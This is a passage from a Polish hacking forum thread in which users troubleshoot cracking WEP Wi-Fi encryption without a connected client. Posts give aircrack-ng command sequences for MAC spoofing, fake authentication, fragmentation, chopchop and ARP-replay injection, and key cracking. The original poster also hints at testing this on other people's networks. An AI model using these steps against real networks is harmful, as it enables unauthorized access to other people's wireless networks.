Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 14

Temat: Jak złamać WEP bez podłączonego klienta -co robię nie tak?

  1. #1
    bpm
    bpm jest offline
    Zarejestrowany
    Nov 2009
    Skąd
    Radom
    Postów
    28

    Domyślnie Jak złamać WEP bez podłączonego klienta -co robię nie tak?

    Witam

    Założyłem sobie jakis czas temu net bezprzewodowy i chciałem przetestować łamanie zabezpieczenia WEP. Wcześniej w UK już to robiłem z powodzeniem więc raczej "świeży" w tym temacie nie jestem Używam obecnie BT4 bo BT3 nie wykrywa karty w moim lapku. Przeczytałem już dużo poradników, youtube też przekopałem i nie mogę sobie poradzić. Więc może napiszę co robię po kolei:

    Otwieram 1 konsolę:
    # airmon-ng stop wlan0
    # ifconfig wlan0 down
    # macchanger --mac <mac_klienta> wlan0
    # airmon-ng start wlan0
    # airodump-ng -c 6 -w plik --bssid <mac_klienta> wlan0


    Otwieram nową konsolę:
    # aireplay-ng -1 0 -e <ESSID> -a <mac_klienta> -h <mac_mojej_karty> wlan0

    Tutaj jest sukces! Niestety później już zaczynają się problemy

    Pierwszy przypadek:
    # aireplay-ng -5 -b <mac_klienta> -h <mac_mojej_karty> wlan0

    Po chwili jest pytanie Use this packet? Oczywiście wybieram Y

    I tak sobie leci po kolei:
    -Data packet found!
    -Sending fragmented packet
    -No answer repeating...
    -Trying a LCC NULL packet
    -Sending fragmented packet itd...
    aż do momentu:
    -Still nothing, trying another packet... i znów:
    Use this packet?


    I tak dalej mogę sobie wybierać Y 100 razy w kółko jest to samo

    Drugi przypadek:

    # aireplay-ng -4 -e <ESSID> -b <mac_klienta> -h <mac_mojej_karty> wlan0

    Znów sobie lecą pakiety około 30 sekund (z tego co czytałem powinno odliczac procentowo do 100% aż pojawi się plik .XOR), a tymczasem efekt:

    Sent 14157 packets, current guess:FD...

    The chopchop attack appears to have failed.


    I tak jak wcześniej moge to robić ze 100 razy

    Trzeci przypadek czyli:

    # aireplay-ng -3 działa tylko kiedy klient jest podłączony.

    Przyznam się, że testowałem to już na kilku "klientach" i za każdym razem porażka jeśli nie jest podłączony. W kilku sieciach zauważyłem, że po użyciu aireplay-ng -3 nawet jeśli klient nie jest podłączony ARP rośnie, baaaaaaardzo powoli w tempie około 10 na godzinę, a w innych znów stoi jak zaklęte na 0. Moja wiedza nie jest na tyle dobra jeszcze i nie wiem czemu tak jest. To tak na marginesie.

    Wróćmy do głównej kwestii czyli, gdzie popełniam błąd podczas próby złamania WEP bez podłączonego klienta? Starałem się dobrze wyjaśnić o co mi chodzi, ale w razie czego czekam na pytania. Pozdrawiam

  2. #2
    Zarejestrowany
    Jul 2007
    Skąd
    UK
    Postów
    360

    Domyślnie

    ja w atkiej sytuacji robie taK(pomijam airrodump bo kanaly sa rozne)

    Kod:
    aireplay -1 0 -e [essid] -a [MACAP] -h [wyimaginowanyMAC-klienta] [interfejs_wifi]
    potem

    Kod:
    aireplay-ng -3 -b [MACAP] -h [wyimaginowanyMAC-klienta] [interfejs_wifi]

    potem

    Kod:
    aircrack-ng  -P 2 *.cap
    Atheros? - nanzwa mhata yangu

  3. #3
    Zarejestrowany
    Dec 2009
    Postów
    1

    Domyślnie

    Mam identyczny problem, a post bemyself nie wydaje mi się pomocny.

    Przy próbie autoryzacji
    # aireplay-ng -1 0 -e <ESSID> -a <mac_klienta> -h <mac_mojej_karty> wlan0

    Otrzymuje pozytywny wynik ale niepokoi mnie pewna rzecz:
    Sending Authentication Request (Open System) [ACK]
    Authentication succesful
    Sending Association Request [ACK]
    Association succesful : - ) (AID: 1)


    Co oznaczają [ACK] i :-) (AID: 1) ?
    W tutorialach nigdzie tego nie bylo, ani w troubleshotach.

    Później tak jak bpm zacinam się na:
    -Data packet found!
    -Sending fragmented packet
    -No answer repeating...
    -Trying a LCC NULL packet
    -Sending fragmented packet itd... aż do momentu:
    -Still nothing, trying another packet... i znów:
    Use this packet?


    Acha... i żeby nikt nie "dumał" chipset: ralink 2661 PCI rt61pci, pracuje na BT4
    Ostatnio edytowane przez qtong : 12-22-2009 - 08:21

  4. #4
    bpm
    bpm jest offline
    Zarejestrowany
    Nov 2009
    Skąd
    Radom
    Postów
    28

    Domyślnie

    Z tego co się obczytałem moja karta czyli Intel 5100 AGN nie wstrzykuje pakietów i stąd te problemy. Podobno jest na to sposób ten:

    http://forum.aircrack-ng.org/index.php?topic=4217.30

    ale widzę koleś robił to na Ubuntu, a po drugie nie mam pojęcia jak to zrobić a tym bardziej na BT4

    Dlatego dostałem od kumpla kartę TP-Link TL-WN610G i teraz potrzebuje jeszcze przejściówkę z ExpressCard na PCMCIA. Wtedy może poleci wszystko bez problemów, no chyba że ktoś ma inny patent na mój ból

  5. #5
    Zarejestrowany
    Jul 2007
    Skąd
    UK
    Postów
    360

    Domyślnie

    Cytat Napisał qtong Zobacz post
    Mam identyczny problem, a post bemyself nie wydaje mi się pomocny.

    Przy próbie autoryzacji
    # aireplay-ng -1 0 -e <ESSID> -a <mac_klienta> -h <mac_mojej_karty> wlan0



    No ta ja sie nie dziwie ze moj post Ci nie pomogl
    Ostatnio edytowane przez bemyself : 12-27-2009 - 21:36
    Atheros? - nanzwa mhata yangu

  6. #6
    bpm
    bpm jest offline
    Zarejestrowany
    Nov 2009
    Skąd
    Radom
    Postów
    28

    Domyślnie

    Cytat Napisał bemyself Zobacz post
    No ta ja sie nie dziwie ze moj post Ci nie pomogl
    Może źle to ująłem, więc jest tak:

    # aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <mac_mojej_karty> wlan0

    i dalej jest to samo.

    Czy ten [wyimaginowanyMAC-klienta] to ten za pomocą którego klient się łączy a widać go w STATION? Bo jesli tak to też nie pomaga.

  7. #7
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Cytat Napisał bpm Zobacz post
    Może źle to ująłem, więc jest tak:

    # aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <mac_mojej_karty> wlan0

    i dalej jest to samo.

    Czy ten [wyimaginowanyMAC-klienta] to ten za pomocą którego klient się łączy a widać go w STATION? Bo jesli tak to też nie pomaga.
    czy ty naprawde nie wiesz co oznacza slowo 'wyimaginowany'?
    War, war never changes.

  8. #8
    bpm
    bpm jest offline
    Zarejestrowany
    Nov 2009
    Skąd
    Radom
    Postów
    28

    Domyślnie

    Cytat Napisał GSG-9 Zobacz post
    czy ty naprawde nie wiesz co oznacza slowo 'wyimaginowany'?
    Wiem doskonale co to wyimaginowany, ale czegoś tu nie rozumiem. Ten wymyślony MAC klienta mam sobie wziąć skąd? Z kosmosu

  9. #9
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    OMG, wymysl jakis!
    War, war never changes.

  10. #10
    bpm
    bpm jest offline
    Zarejestrowany
    Nov 2009
    Skąd
    Radom
    Postów
    28

    Domyślnie

    W związku z tym, że o takim sposobie z wyimaginowanym MAC'iem nie słyszałem, ale wypróbuję mam pytanko jedno.

    Dlaczego ma to być jakiś wymyślony MAC a nie może to być MAC mojej karty?

    Zrobiłem dokładnie tak samo z wyimaginowanym MACiem i w dalszym ciągu jest porażka. Oto wynik:

    Read 17256 packets (got 1 ARP requests and 0 ACKs), sent 1267321 packets... (500 pps)

    I co dalej? Jak wstrzykiwać pakiety bez podłączonego klienta, jak w temacie?
    Ostatnio edytowane przez bpm : 12-31-2009 - 15:44

Strona 1 z 2 12 OstatniOstatni

Podobne wątki

  1. Odpowiedzi: 2
    Autor: 04-29-2009, 10:16
  2. PTW bez clientow WEP (posiada filtracje mac)
    By hazi in forum Wardriving
    Odpowiedzi: 3
    Autor: 04-16-2008, 22:44
  3. siec WEP bez klientow
    By rooot in forum Wardriving
    Odpowiedzi: 0
    Autor: 08-27-2007, 16:55
  4. Jak ja to robię?
    By Flavoxx in forum Off Topic
    Odpowiedzi: 5
    Autor: 08-15-2007, 15:38

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj